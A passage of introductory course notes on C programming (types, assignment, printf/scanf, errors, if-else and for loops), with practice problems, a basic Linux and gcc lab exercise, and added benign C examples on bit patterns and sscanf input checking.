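/* Write the 32 bits of `value`, most significant bit first, as the notes
 * print them: four groups of eight separated by spaces. `out` needs room
 * for 32 digits, 3 spaces and the terminating NUL: 36 characters. */
void int_to_bits(int value, char out[36])
{
    uint32_t u = (uint32_t)value;        /* same 32 bits, viewed unsigned */
    int pos = 0;
    for (int bit = 31; bit >= 0; bit--) {
        out[pos++] = ((u >> bit) & 1u) ? '1' : '0';
        if (bit % 8 == 0 && bit != 0)
            out[pos++] = ' ';
    }
    out[pos] = '\0';
}

/* Leftmost bit of the stored int: 0 for positive, 1 for negative. */
int sign_bit(int value)
{
    return (int)(((uint32_t)value >> 31) & 1u);
}

/* The byte 01000001 interpreted under each declared type. As a char it is
 * ASCII 'A'; as an int (three leading zero bytes) it is 65. */
char byte_as_char(unsigned char b) { return (char)b; }
int  byte_as_int(unsigned char b)  { return (int)b; }

/* What the ASCII table in the notes gives: the code stored for a character. */
int ascii_code(char c) { return (unsigned char)c; }

/* Caveat the notes leave out: the textbook picture puts the most significant
 * byte first, but on x86 the int 2 is stored in memory with its least
 * significant byte (00000010) at the lowest address. Returns 1 if so. */
int int_stored_little_endian(void)
{
    int two = 2;
    unsigned char bytes[sizeof two];
    memcpy(bytes, &two, sizeof two);      /* copy the raw bytes out */
    return bytes[0] == 2;
}

int main(void)
{
    char bits[36];
    int_to_bits(2, bits);
    printf("int 2   -> %s\n", bits);
    int_to_bits(65, bits);
    printf("int 65  -> %s\n", bits);
    int_to_bits(-5, bits);
    printf("int -5  -> %s (sign bit %d)\n", bits, sign_bit(-5));
    printf("byte 01000001 as char: %c, as int: %d\n",
           byte_as_char(0x41), byte_as_int(0x41));
    printf("least significant byte first in memory: %s\n",
           int_stored_little_endian() ? "yes" : "no");
    return 0;
}
```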
When we first declare a variable, it will have a value determined by whatever pattern of ones and zeroes was left in that memory location by the previous program. For our purposes, this value is a garbage value. To avoid inadvertently using garbage values in a program, it is often advisable to initialize variables when they are declared. The syntax is:

    type variable_name = value ;

Some examples of variable declarations in which the variable is initialized in the declaration are:

    int answer = 0;
    float weight = 350 ;

Practice Problem 2.1
What data type would be optimal to store the following classes of data?
(a) The number of jellybeans in a jar
(b) The cost of a Snickers bar
(c) The circumference of a lollipop
(d) The individual letters in the word "skittles"
Solution:
(a)
(b)
(c)
(d)

Practice Problem 2.2
How many total bytes would be needed to store the following variables?

    int tacos, chimichangas;
    int nachos = 14;
    float pico, de, gallo;
    char tortilla, guacamole;
    float burritos = 2;

Solution:

2.5. The Assignment Statement.

The direct way to change the value of a variable is by use of the assignment statement. The assignment statement has the form:

    variable = expression;

where the expression on the right can be:

- a literal (i.e., a number such as 5, or a character such as the dollar sign)
- another variable
- a more complicated expression made up of literals, variables and mathematical operators

Some examples of assignment statements are:

    int answer, solution;
    answer = 10;
    solution = answer;        // Now solution equals 10
    answer = solution + 10;   // Now answer equals 20

It is important that you understand how an assignment statement works. In an assignment statement, the value of the expression on the right hand side of the equal sign is first computed, and then the variable on the left hand side of the equal sign is changed to this value.
For example, the statement:

    area2 = area2 + 10;

would make no sense as an algebraic equation, but in C this statement means: “Make the new value of area2 equal to the old value of area2 plus ten.” It is important to note that the equals sign is the assignment operator.

A note about char variables. Variables of type char hold single characters such as a, b, … z, A, B, … Z, 0, 1, … 9, !, #, @. It is important to note that a character literal is enclosed in single quotes. For example, to declare a variable that will be used to store marital status (M for married, S for single), we might use:

    char marital_status;
    marital_status = 'M';

Of course the two previous lines of C code could have been combined into one declaration as

    char marital_status = 'M';

2.6. Mixing Types

Generally, you should not store a value of one type in a variable of another type. The biggest problem occurs when storing a real number in an integer variable. When we store a real number in an integer variable, the portion after the decimal is truncated (not rounded).

Practice Problem 2.3
Consider the two lines of C code:

    int a;
    a = 0.9999;

If we were to now print out the value of the variable a, what value would we see?
Solution:

Of course every rule has its exception. Concerning “mixing types,” it is acceptable to assign integers to variables of type float. The following code would be perfectly fine:

    float speed;
    speed = 55;   // sets speed = 55.0

3. Simple Output

3.1. The printf statement

To output data from our program to the screen (i.e., the monitor) we use a printf statement. Think of printf as being another name for the monitor. By using printf we can send to the screen:

- values of variables
- arithmetic expressions
- strings of text

printf syntax for character strings. The syntax for printing a string of characters is

    printf( " the stuff I want printed " ) ;

Note the quotation marks. When we want to output a text string, we place the string in quotes.
The text string appears exactly as typed, except the quotes are not printed on the screen. For example, the line of C code

    printf( "To be a mid or not to be." );

will output to the monitor:

    To be a mid or not to be.

3.2. A Note on Spacing.

The computer will not insert spaces before or after the items that are output using printf. A new printf will start printing to the screen exactly where the last printf left off. We often begin and end strings with blanks to keep the output from running together.

Practice Problem 2.4
What is the output produced by these two lines of C code:

    printf("Go Navy!");
    printf("Beat Army!");

Solution:

3.3. Output Escape Sequences.

Since a new printf statement begins where the last printf statement left off, output will run along one line. To get a new line, we use "\n" (i.e., \n inside quotes). The sequence \n is called an escape sequence. The backslash tells the compiler to escape the normal meaning of the next character, and apply an alternate meaning. In this case, "\n" tells the compiler to advance the cursor to the next line on the screen. Other escape sequences:

    \t    tab
    \\    print a backslash
    \"    print a double quote symbol
    \'    print a single quote symbol

Practice Problem 2.5
What is produced by each of these code snippets?

(a) printf("Go Navy\n");
    printf("Beat Army\n");
(b) printf("Go Navy\nBeat Army\n");
(c) printf("Go Navy\tBeat Army\n");
    printf("\"Go Navy\nBeat Army\"\n");
    printf("A\\B\n");

Solution:
(a)
(b)
(c)

3.4. printf with conversion specifiers

Conversion Specifiers. Next, we discuss the printf syntax for printing numbers and characters within strings. What was previously termed a character string is now termed a control string, since it will also contain information which controls how variables will appear. We must specify the format of the numbers and/or characters with conversion specifiers, which describe the format to be used in printing the corresponding variables.
The order of the conversion specifiers is matched to the order of the variables that appear after the control string. The conversion specifiers are:

    %d    for an integer
    %f    for a floating point
    %c    for a character
    %s    for a string

The use of conversion specifiers is best illustrated with an example.

Practice Problem 2.6
Explain what is printed out by the following lines of C code:

    int number = 3050;
    float gpa_low = 3.13 , gpa_high = 3.95;
    printf("%d midshipmen have a GPA between %f and %f\n", number, gpa_low, gpa_high);

Solution:

Conversion Specifiers with Simple Strings. We mentioned that we can print a string of characters without using conversion specifiers. For example, we could print the phrase Go Navy! by using the statement:

    printf("Go Navy!");

We could, just as well, have used a conversion specifier to print out this string of characters, as in:

    printf( "%s" , "Go Navy!" );

It may cause fewer errors to consistently use format specifiers, even for simple character strings.

Practice Problem 2.7
Determine the error in the complete C program shown below:

    #include <stdio.h>
    int main()
    {
        int apples = 42;
        printf("There are %c apples in my barrel\n", apples);
    }

Solution:

4. Simple input with the scanf statement

4.1 The scanf statement.

The scanf statement is used for inputting data to the program from the keyboard. Think of scanf as being another name for the keyboard. The scanf statement, like the printf statement, uses a control string followed by the memory locations of the variables to receive the values typed in at the keyboard. Best to go to an example! To read an item from the keyboard and place the value into a variable named year_number of type int, we use:

    int year_number;
    scanf("%d" , &year_number);

The first part following the parenthesis—%d—is the conversion specifier. The %d indicates that the item that we will type in at the keyboard is intended to be an integer.
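The scanf statement above reads from the keyboard, so its behaviour cannot be checked without typing. The added example below (not from the notes) uses sscanf, which takes the same control strings as scanf but reads from a string, over constructed input lines, and adds a check the notes do not mention: scanf returns how many items it converted, and a variable it could not fill keeps whatever value it had before.

```c
/* Added example (not from the EC310 notes): the control strings used with
 * scanf, applied with sscanf to constructed input lines so the result can be
 * checked. sscanf and scanf differ only in where the characters come from. */
#include <stdio.h>
#include <string.h>

/* scanf("%d", &year_number) in a testable form. Returns 1 if an integer was
 * converted and stored through `year`, 0 otherwise. On failure `*year` is
 * left untouched, so an uninitialized variable would keep its garbage. */
int read_year(const char *line, int *year)
{
    return sscanf(line, "%d", year) == 1;
}

/* Two values from one line with the "%d %d" control string. Returns how many
 * integers were converted (0, 1 or 2). %d skips spaces, tabs and newlines
 * before each number, so "2015   4" and "2015\t4" both work. */
int read_year_month(const char *line, int *year, int *month)
{
    return sscanf(line, "%d %d", year, month);
}

/* Hardened version: accept the input only when both numbers converted and
 * the month is 1-12; otherwise return 0 and leave the outputs unchanged. */
int read_year_month_checked(const char *line, int *year, int *month)
{
    int y, m;
    if (sscanf(line, "%d %d", &y, &m) != 2)
        return 0;                       /* not two integers */
    if (m < 1 || m > 12)
        return 0;                       /* converted, but out of range */
    *year = y;
    *month = m;
    return 1;
}

/* printf's side of the same specifiers: the "It is now" message written into
 * a buffer instead of the screen. Returns the message length. */
int format_date(char *out, size_t size, int year, int month)
{
    return snprintf(out, size, "It is now %d / %d", month, year);
}

int main(void)
{
    int year = 0, month = 0;
    char msg[64];
    const char *good = "2015 4";        /* constructed keyboard lines */
    const char *bad = "Plebe Summer";
    if (read_year_month_checked(good, &year, &month)) {
        format_date(msg, sizeof msg, year, month);
        printf("%s\n", msg);
    }
    printf("\"%s\" converted %d values\n", bad,
           read_year_month(bad, &year, &month));
    return 0;
}
```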
As before, we use the conversion specifiers:

    %d    for an integer
    %f    for a floating point
    %c    for a character
    %s    for a string

The second part of the scanf statement—&year_number—indicates that the integer typed in at the keyboard should be placed in the variable named year_number. It is a very common error to omit the & in scanf statements. [5]

You should understand how the scanf statement works. When the computer sees a scanf statement, it stops and waits for input to be entered from the keyboard. The program does not read the input until the user hits the ENTER key. (This allows the user to backspace and correct mistakes.) Pressing the ENTER key makes the data that we type available for the program. When we press ENTER, what we typed in is assigned as the variable’s value, and the computer then resumes operation. Before reading something from the keyboard, it is always a good idea to prompt the user to enter the value using a printf statement.

Practice Problem 2.8
What is the output produced by this complete C program:

    #include<stdio.h>
    int main()
    {
        int year_number;
        printf("Enter the year: ") ;
        scanf("%d" , &year_number);
        printf("\nThe year is %d \n" , year_number);
    }

Solution:

You can enter multiple values using a single scanf statement. This is illustrated in the practice problem below.

Practice Problem 2.9
What is the output produced by this complete C program:

    #include<stdio.h>
    int main()
    {
        int year, month;
        printf("Enter the year and the month (1-12): ") ;
        scanf("%d %d" , &year , &month);
        printf("\nIt is now %d / %d \n" , month , year);
    }

Solution:

Note that values entered via the keyboard must be separated by at least one blank. The first value entered at the keyboard is stored in year and the second in month. When the computer reads in data with scanf, it ignores spaces, tabs and returns (other than using the return as a signal from the user that data has been entered).

[5] The ampersand that precedes the variable year_number is the address operator. We’ll talk more about this later. For now, just remember that with the scanf statement you want to ensure you include an ampersand before each variable name of type int, float and char.

Practice Problem 2.10
Add one line to the C program shown below (at the point indicated) so that the output shown below is produced when the user enters 3.5 when prompted.

    #include<stdio.h>
    int main( )
    {
        float number;
        printf("Enter a number and I will multiply it by 2: ");
        scanf( "%f" , &number );
        // Enter one line of code here!
        printf("Twice the value you entered is: %f \n" , number );
    }

Desired output:

    Enter a number and I will multiply it by 2: 3.5
    Twice the value you entered is: 7.000000

Solution:

Practice Problem 2.11
Match the term on the left with its appropriate description on the right:

    printf                 (a) the C programming language
    instruction set        (b) the C assignment operator
    scanf                  (c) translates assembly language into machine language
    machine language       (d) the conversion specifier for an integer value
    compiler               (e) allows the program to receive keyboard input
    assembler              (f) the C escape sequence for a new line
    high-level language    (g) instructions expressed as bits
    assembly language      (h) program that converts source code to machine language
    %d                     (i) all of the simple instructions hard-wired on a CPU
    =                      (j) used to display text to the monitor
    \n                     (k) English-like words that represent machine code

Solution:

5. Program Errors

A program error is termed a bug. The process of finding and eliminating program errors is called debugging. There are three different types of program errors.

Syntax errors. These are violations of the C grammar rules. These errors are caught by the compiler.

Run-time errors (also called execution-time errors). These are errors that are detected as the program is running. These errors usually entail an attempt to perform an illegal operation, and usually cause the program to crash.

Logic errors – these errors are the hardest to find!
The program is grammatically correct and executes without errors, but does not do what we want it to do. As an example, suppose we calculate the average of two float values a and b and assign the result to a float variable named average by using:

    average = a + b /2.0 ;

Since C evaluates division before addition, the statement above will be understood by the C compiler as:

    average = a + (b /2.0) ;

which is, of course, not what we intend! [6]

[6] The correct line of C code to perform the average would be:

    average = (a + b) /2.0 ;

To avoid logic errors, you should “trace through” your program on paper to make sure the logic is correct. When you trace through the program, you should consider various input possibilities. Statistics show that greater than 50% of a programmer’s time is spent on debugging.

For your reading and viewing pleasure, here are some examples of software errors that led to disasters of one type or another. These will not be reviewed in class: View/read on your own time if interested.

Runtime error: http://www.wired.com/science/discoveries/news/1998/07/13987
Logic error: http://en.wikipedia.org/wiki/Mars_Climate_Orbiter

Reading

Read Appendix 2, titled "The Linux File System".

Problems

1. Write a complete C program that prompts the user to enter his initials. The program should then provide the following output message EXACTLY as shown below (where, in this illustration, the user entered his initials as P and V):

    Please enter your initials: PV
    Thank you PV for using the program.

Turn in a copy of your source code and a screen capture of your program successfully running. For example, my source code is shown below:

2. Write a complete C program for converting temperature values from degrees Fahrenheit to degrees Celsius. The program should prompt the user to enter a temperature in units of degrees Fahrenheit. The program outputs the temperature in degrees Celsius.
If $T_f$ is the temperature in degrees Fahrenheit, the temperature in degrees Celsius, $T_C$, is given by

$$T_C = \frac{5}{9}\,(T_f - 32)$$

You should declare the two temperatures to be of type float. Turn in a copy of your source code and a screen capture of your program successfully running. For example, my source code is shown below:

3. Start at your command prompt for the EC310 VM:

    midshipman@EC310:~ $

(a) Determine how many users have accounts on your Linux system. What are their names?
(b) How many items (directories and files) are immediately under the root directory?

4. How many total bytes would be needed to store the following variables?

    int time_1, time_2, time_3;
    float PRT1 = 9.5, PRT2 = 8.7;
    char mid_1, mid_2;

5. Determine the error contained in the program shown below.

    #include <stdio.h>
    int main()
    {
        int favoriteNumber = 2017;
        printf("My number is %d\n", favorite_Number);
    }

6. Consider the Linux file system shown below.

[Figure: Linux directory tree (not reproduced)]

(a) What is the absolute pathname for the directory bob?
(b) What is the absolute pathname for the file lesson5?
(c) If your working directory is joe, what is the relative pathname for the file lesson5?
(d) If your working directory is dane, what is the relative pathname of the root directory?

7. For each of the following questions select the answer that best identifies the type of computing code being described from the choices: high-level code, assembly code, machine code, honor code.
(a) Code resulting from a successful compilation of a C program's source code.
(b) Code used when we write programs in the C programming language.
(c) This code uses English-like mnemonics which correspond to machine instructions.

8. You and your friend have been tasked to write a C program that prompts the user to enter his initials. The program should then print to the monitor the user's initials. For example, here is how a run of the program should look:

[Figure: sample run of the program]

Your friend has written the program shown below, but her program contains an error.
(Note that the numbers shown on the far left are line numbers shown for convenience… these are not part of the program.)

    1  #include <stdio.h>
    2  int main( )
    3  {
    4      char init1, init2;
    5      printf("Please enter your initials: ");
    6      scanf("%c %c", &init1, &init2);
    7      printf("Thank you %c%c for using the program\n",
    8             init2, init1);
    9  }

(a) Determine the error. Note: Splitting a printf statement across two lines (as shown on lines 7-8) does not cause any problems.
(b) What type of error is this (syntax, runtime or logical)?

Security Exercise 2

Part 0: Ground Rules

Do not attempt to physically alter any equipment in the lab, aside from your own laptop. Once your instructor has verified that you have completed all portions of the security exercise, you may turn in your completed security exercise answer sheet (the last page, where you place your answers). It is at your instructor's discretion whether you may leave early. While each student must be doing the security exercise on his own PC, you are free to consult and confer with friends who are nearby. Learning from your friends is encouraged!

Safety tip: You must be doing the security exercise during the lab session. You will have 1 point deducted from your final course grade for each time your instructor catches you surfing the web, checking your email, or doing anything other than the security exercise. Don’t do it!

Part 1: Starting Point

Start VMware Workstation. Click "Power on this virtual machine", which should be the virtual machine you loaded on the first day of class. You should see something similar to this mysterious screen:

[Figure: screenshot of the virtual machine after power-on]

So, our plan today is to run C programs in a Linux environment using VMware. To which you are probably saying: Who am I? Why am I here? Don’t worry! It’ll be fun!!! We said that our goal is to “Run C programs in a Linux environment using VMware.” This likely raises three questions in your mind:

- What is this mysterious thing that you are calling “VMware”?
As a related question: Do I have to come to class, or can I attend virtually?

Linux is not Windows… and therefore I fear it. Why are you making me use this exotic operating system?

How do I run C programs? And what is for dinner in King Hall today?

We’ll answer each of these questions in turn. So, first:

What is VMware?

VMware allows you to “play” other operating systems on your Windows computer. It used to be the case (about ten years ago) that if I wanted to have, say, a Windows computer, an Apple computer and a Linux computer, I would have had to buy three separate computers: a Windows computer, an Apple computer and a Linux computer.

More recently (about seven years ago), dual-booting became more prevalent. In this case, I could run Windows and Linux on the same computer, but I had to choose which operating system I wanted to run—i.e., as soon as the computer was turned on, I would be prompted to make a choice, and then I had to stick with that. If I was running Linux but then wished to switch to Windows, I would have to restart the computer and then, when prompted, state that I wanted the computer to run as a Windows machine.

Then, along came VMware. VMware allows us to “play” another operating system as though it were just another application. Just as I can have a window open with a PowerPoint application running, and a window open with a Firefox application running, I can—using VMware—have a window open with the Linux operating system running.

So, shown below is a snapshot of my computer screen (obviously, your background and icons will be far less interesting). Note that I am using Windows 7 as my operating system, but the VMware window that I have open is running a Linux operating system. The Linux operating system that is running in that window works the same way as if I bought a computer and installed Linux as the base operating system on it.

Hopefully you are saying: Wonderful, I can run Linux using VMware.
So, we now reach your second question: Why do we want to run Linux? Why not conduct EC310 just using the Windows environment?

Linux has cornered a whopping 1.5% of the desktop operating systems market share (as of April 2015). Windows has over 90% of the market share. In fact, more people use the horror known as “Windows Vista” than use Linux. Really, please, come on, who uses Linux? So, why would we use Linux? I mean, for reasons other than sadism.

First, let’s note that for server operating systems—the operating systems that do the heavy lifting of managing web servers, managing email servers, and so forth—a different operating system—the UNIX operating system—far surpasses Windows in market share! Well over half of all servers run a variant of UNIX. Linux is a flavor of UNIX.

But the real attraction of Linux is that it is open source. Anything and everything about Linux is available to be viewed. There are no trade secrets. Windows, on the other hand, is a proprietary commercial product. Microsoft only gives us the machine language code, not the source code. So, we really do not know the inner workings of Windows. How and why Windows operates the way it does is a trade secret. So, by using Linux, we can understand precisely what is going on, since the entire operating system is out in the open. And we want to understand precisely what is going on.

So… shall we write some C programs? Well… not quite yet. First let's refresh ourselves on how the Linux directory structure is organized.

First, we will usually work within the terminal window. The terminal window is shown below. You enter commands at the prompt. The prompt in the picture above is the part that says:

    midshipman@EC310:~ $

All users of a Linux operating system have an account name (also referred to as a user name or a login name) and a password. When your Linux account is created, you are also given a home directory where all of your files and folders will reside.
Your home directory has the same name as your account name. You may be wondering: Hey, I’m right now using Linux in EC310 and I was never asked for an account name and password while logging on? That is because your textbook author (Jon Erickson) has set up your VMware software to provide Linux “already open” for you. We have, however, changed your account name to midshipman since that is, after all, your first name.

Even more specifically, the command line interface (where we enter commands) is called the bash shell. Every time you enter a command, you are entering the command at the bash shell’s prompt. The bash shell’s prompt for ordinary users is the dollar sign. Before the prompt, you will see your account name and your computer's name.

[Annotated prompt: your account name, your computer's name, the prompt]

There is one additional item in the picture above that you may have noticed: the tilde symbol (~). The tilde is an abbreviation for your home directory. When you log in, you are placed by default in your home directory.

Suppose you wander up to a computer and notice that someone is logged on, and you see this:

Then the user whose account name is joe has logged in but has forgotten to log out. Bad stuff.

If you ever forget who you are, even though your account name is staring you in the face, you can enter:

    whoami

as shown below. Go ahead… Enter whoami (you know you want to) and confirm that you are indeed the user named midshipman.

In Linux, just as with Windows, there are files. And in Linux, just as with Windows, there are directories (in Windows terminology, these are referred to as folders), which hold files (or other directories). A Linux system (like a Windows system) may support multiple users. In such cases, each user is given his own home directory. When you log on, you are automatically placed in your home directory. When Joe logs on, he is automatically placed in his home directory. Your home directory is the natural location for any directories or files that you create.
You can leave your home directory and move to other directories. Whatever directory you find yourself in, that directory is termed your working directory.

A portion of your Linux file system (also called a directory structure) looks like this:

At the very top is the root directory, denoted /. The root directory contains all directories and files.

Every Linux system has a special user named root. The root user is the great-and-all-powerful system administrator of the Linux system. The root user can access any file on the system, including the files of individual users. The root user can read the files of all users, can write over any files, and can delete any files. The root user can load any software onto the system (e.g., programs). The root user owns the system. The dream of all hackers is to somehow become the root user.

In Linux, the root user has a special prompt, the pound sign (#). If you walk up to a computer and see this:

that means the root user has logged in and left the computer unattended. That would be bad, since that would mean you could look at all files on the system (for all users) and add any software you like to the system (including malware).

Listing Files

You can list the contents of the working directory by using the ls command. In your home directory, at the command prompt type:

    ls

(note this is a lower case L)

Question 1. List the contents of your working directory.

Changing Your Working Directory

Right now, your working directory is the same as your home directory: midshipman. Suppose you want to change your working directory to booksrc (see the directory structure shown above). To do this, type:

    cd booksrc

When you change your working directory, the command line will update to indicate your new working directory. You should now see your prompt with the working directory changed to ~/booksrc.

At any time, you can travel "up" one directory by typing

    cd ..
Go ahead and enter this: that is, the two letters cd, followed by a space, followed by two periods (with no space between the periods). Note that cd stands for change directory. Since you were in the booksrc directory, you should have moved up one level back to your home directory. In other words, you should see this:

Question 2. Starting at your home directory (where you should presently be), move up one directory and list the contents of your new working directory.

If you are navigating around the directory structure, and you forget where you are, you can enter the command

    pwd

which stands for print working directory.

If you find yourself lost in the file system, you can instantly reset your working directory back to your home directory by simply typing cd by itself (i.e., without the two periods). Go ahead and type cd and confirm you are back in your home directory.

Part 2: Your First C Program

Now where were we… Oh yes! The C program! Before we begin, type the following at the prompt: cd work. That is, enter what is shown after the prompt below:

    midshipman@EC310:~ $ cd work

(midshipman@EC310:~ $ is the prompt; cd work is what you enter.) Your prompt should now be

    midshipman@EC310:~/work $

We will enter all of our programs in the work directory.

Question 3. List the current contents of your work directory.

We are going to enter our C program using a simple text editor named nano. Let’s name our first C program lastname_2_1.c where you use your own last name. So, if my last name is smith, I would name this program smith_2_1.c. So, enter the following at the prompt (again, using your own name instead of “smith”):

    midshipman@EC310:~/work $ nano smith_2_1.c

Why did I pick the name smith_2_1.c? The two stands for Security Exercise 2 (i.e., we are now conducting EC310 Security Exercise 2). The one stands for your first program. So, this is your first program in Security Exercise 2.
You should see the editor opened with the correct file name at the top as shown below. Note the file name.

Now, carefully type the program below into the file smith_2_1.c

    #include <stdio.h>
    int main( )
    {
    }

Your screen should look like this:

Now we want to save this file. In nano, to save a file we use Control + o (that is, we press the Control key and the small letter o key at the same time). At that point nano will ask you if you want to still save the file under the original name. Just hit enter. Now, exit from nano by using Control + x. You should be back to the terminal prompt:

You may now be wondering: How do I know the file that I just typed exists? Where is it? You already know the answer! To see all of your files enter the letters ls at the command prompt. So, at the prompt, type ls:

    midshipman@EC310:~/work $ ls

and you should see:

So, your C file is there! Now remember, your C program is source code. The CPU does not understand source code—it only speaks in machine language. So we have to compile the source code into machine language using a compiler. The compiler we will use is gcc. So, at the prompt, compile your program by typing in gcc followed by the name of your C program. For me, I will enter:

    midshipman@EC310:~/work $ gcc smith_2_1.c

Looking at the resulting screen… it looks like nothing happened. Linux just went right back to the prompt. Ask yourself… What should have happened? Linux should have created a machine language file. Did it? Linux automatically names the output of the C compiler as a.out. So… do you have a file named a.out? Let’s see. Type ls at the prompt and check if you have a file named a.out. I do! Joy!

Alright… what do we do after we compile our program? We execute it! To execute the program, we simply type a period, followed by a slash, followed by the name of the executable code (the machine language file) at the prompt and hit enter.
So, we should type

    midshipman@EC310:~/work $ ./a.out

and hit enter and… and… and… nothing happened.

Question 4. Why did nothing happen?

Part 3: A C program that does something!

It’s kind of a law of Computer Engineering that your first real program has to be a program that prints the message Hello World! to the monitor. Since this is the Naval Academy, we will modify this and write a more appropriate program that prints the message Hello Cruel World! to the monitor. Here are the steps.

a) Using nano, open your existing file (for me, this file is smith_2_1.c).
b) Modify your source code so that it will print the desired message with a blank line above and a blank line below the message. You should only need to add a single line of code to the program: a single printf statement. Remember that to get a new line you use the escape sequence \n.
c) Compile your program.
d) Run your program.

If all works well, you should see this:

Note the cruel message! And note the blank lines around the cruel message! When your program works correctly, show it to your instructor or lab tech. Your instructor or lab tech will sign Question 5 on the Security Exercise.

UNIX Tips and Tricks

Are you getting tired of typing in the exact same commands again and again? As you develop a file, you may have to open it for editing numerous times (by typing nano smith_2_1.c), you may have to compile it again and again (by typing gcc smith_2_1.c), and you may have to execute it again and again (by typing ./a.out). Engineers often find themselves typing the same commands again and again and again. In an effort to make life easier, UNIX (well, actually it’s the bash shell) remembers the recent commands that you have entered at the command line. You can view the recent commands that you have entered by pressing the up-arrow; each press of the up-arrow moves us back by one earlier command. So, say you want to enter nano smith_2_1.c and you know that you have recently entered this command.
You can press the up-arrow repeatedly until you find the command, and then hit enter. UNIX will treat this as though you have typed in the command and pressed enter. You are urged to try this (since it allows you to avoid a huge amount of repetitive typing). Ask your instructor for help if, after reading this, you do not understand this feature.

Enabling the mouse within the nano editor. You can make the mouse functional within the nano editor by starting the editor with the -m option. For example:

    nano -m smith_2_1.c

Part 4: The world’s simplest calculator!

We want to write a program that will prompt the user to enter two integers. The program will then return the sum of the two numbers. An execution of your program should look exactly like the run shown below, where, in this case, the user entered the numbers 3 and 4. Your program should provide the correct answer for whatever two integers the user enters.

Shown below is the program, except it is missing three lines of code. Your task is to complete the program. So, start by entering the program shown below as smith_2_2.c. Your goal is to replace the three comments with C code that makes the program work as intended.

    #include <stdio.h>
    int main( )
    {
        int number1 , number2 , sum ;
        printf("\nEnter two integers and I will tell you their sum: ");
        // line of code to read in the two values from the keyboard
        // line of code to add the two values together
        // line of code to print out the sum
    }

Demo your working program to your instructor or lab tech. Your instructor or lab tech will sign your Security Exercise for completing the demo for Question 6.

Question 7. How much total memory is taken up by your variables in the preceding program?

Question 8. When I execute the preceding program, why do I have to run the file a.out? Why can't I just run the file smith_2_1.c?
Security Exercise 2 Answer Sheet

Name:

Question 1:
Question 2:
Question 3:
Question 4:
Question 5: _____________________________ Instructor or Lab Tech Signature
Question 6: _____________________________ Instructor or Lab Tech Signature
Question 7:
Question 8:

Chapter 3: Assembly Language and Memory

Objectives:
(a) Explain the operations of several basic assembly language commands, including mov, cmp, jmp, jle, jne and inc.
(b) Demonstrate the ability to debug a running C program in memory, to include the inspection of processor registers and arbitrary memory locations.
(c) Demonstrate the ability to analyze C programs that employ if-else statements and for loops.
(d) Apply Boolean logic to evaluate how selection structures can alter program flow.
(e) Analyze existing programs for flaws with the gdb debugger.

1. A Little More C: The if-else selection structure and the for repetition structure

The order in which program statements are executed is called flow of control. All of the programs that we have seen so far consist of statements executed in order, one after the other. As we will see, we often need to vary the order in which statements are executed.

1.1 The if-else statement

Consider the following example: Write a program that accepts the user’s GPA as an input and prints “You’re on the Dean's List!” if her GPA is greater than or equal to 3.5, and prints “Keep trying!” if her GPA is less than 3.5.

Right now, we can’t solve this simple problem because we have no way for a program to choose between alternatives. To solve this problem, C provides an instruction that allows the user to select which statements to execute based on the value of one or more variables. This useful C instruction is the if-else statement. The program that solves the problem above is shown below, with two annotations:

If the value of the variable gpa is greater than or equal to 3.5, all of the statements between the braces following the if will execute.
The statements within the braces after the else are skipped. If the value of the variable gpa is less than 3.5, all of the statements between the braces following the else will execute. The statements within the braces following the if will be skipped.

    #include<stdio.h>
    int main( )
    {
        float gpa;
        printf( "Enter GPA: ");
        scanf( "%f" , &gpa ) ;
        if ( gpa >= 3.5 )
        {
            printf("\nYou're on the Deans List!\n");
        }
        else
        {
            printf( "\nKeep trying!\n" );
        }
        printf( "\nGo Navy!\n\n" );
    }

In the code above—immediately after the word if—we have a Boolean expression in parentheses: gpa >= 3.5. A Boolean expression is an expression that always evaluates to either true or false. If this particular Boolean expression is true (i.e., if the value of the variable gpa is indeed greater than or equal to 3.5), the statements contained within the first set of braces (following the word if) will be executed, and the statements within the second set of braces (following the word else) will be skipped. If, on the other hand, the Boolean expression is false, the statements within the braces following the word else will execute (and the statements within the braces following the word if will be skipped).

Shown below are two separate executions of the program shown above. Note that in both cases, the printf statement

    printf( "\nGo Navy!\n\n" );

is executed.

The simplest Boolean expression compares numbers and/or variables using a comparison operator. You should be familiar with the usual operators: >, >=, < and <=, == and !=. The table below summarizes these comparison operators.

    Comparison Operator   Meaning
    >                     Greater than
    >=                    Greater than or equal
    <                     Less than
    <=                    Less than or equal
    ==                    Equal
    !=                    Not equal

In C, we can check for equality by using two equals signs in a row, with no space between them.
So, for example, a Boolean expression that can be used to check if a float variable named hours is equal to forty would be

    hours == 40

In C, we can check for inequality by using an exclamation sign followed by an equals sign. So, for example, a Boolean expression that can be used to check if a char variable named grade is not equal to F would be

    grade != 'F'

There are two modifications we can make to the if-else statement. The first modification is that we don’t have to have the else part. In this case, the program performs the statements in braces following the word if when the Boolean expression is true, and skips these statements if the Boolean expression is false. Consider our earlier program without the else portion, and the corresponding screen captures:

    #include<stdio.h>
    int main( )
    {
        float gpa;
        printf( "Enter GPA: ");
        scanf( "%f" , &gpa ) ;
        if ( gpa >= 3.5 )
        {
            printf("\nYou're on the Deans List!\n");
        }
        printf( "\nGo Navy!\n\n" );
    }

The second modification is that if there is only a single statement within the curly braces of the if or the else, then the braces are optional. The programs shown above will work just as well without the braces surrounding the printf statements.

1.2. The for statement

Many programs include some actions that must be performed again and again, some number of times—that is, we may want to repeat sections of our program again and again. A part of a program that repeats a number of statements is called a loop. Let's jump right into examining a program that uses a for loop, along with its corresponding output.

    #include<stdio.h>
    int main()
    {
        int count;
        for( count = 1 ; count <= 5 ; count = count + 1)
        {
            printf( "%d\n" , count );
        }
    }

Any statements within curly braces following the word for comprise the body of the loop; these statements will be executed each time the loop iterates.
In this example, there is only one statement within the body of the for loop:

    printf( "%d\n" , count );

and so each time the loop iterates, the program will print out the value of the variable count, followed by a new line.

The question remains: What controls the number of times the loop will iterate? In this example, the variable count will be used to determine the number of times the loop executes. When we enter the for loop, the loop control variable (i.e., count) is initialized:

    for( count = 1 ; count <= 5 ; count = count + 1)

The first part, count = 1, tells how the loop control variable is initialized. This initialization occurs only once.

Next, the program checks to see if the Boolean expression is true:

    for( count = 1 ; count <= 5 ; count = count + 1)

The second part, count <= 5, compares the loop control variable to 5. This Boolean expression is used to determine if the loop should execute. Since the variable count (at this point in time) is equal to 1, the Boolean expression is true and we execute the statement in the body of the loop. The output we see on the screen is:

When we finish executing the body of the loop, we update the loop control variable:

    for( count = 1 ; count <= 5 ; count = count + 1 )

The third part, count = count + 1, updates the loop control variable. The loop control variable count is now equal to 2. We once again return to the Boolean expression:

    for( count = 1 ; count <= 5 ; count = count + 1)

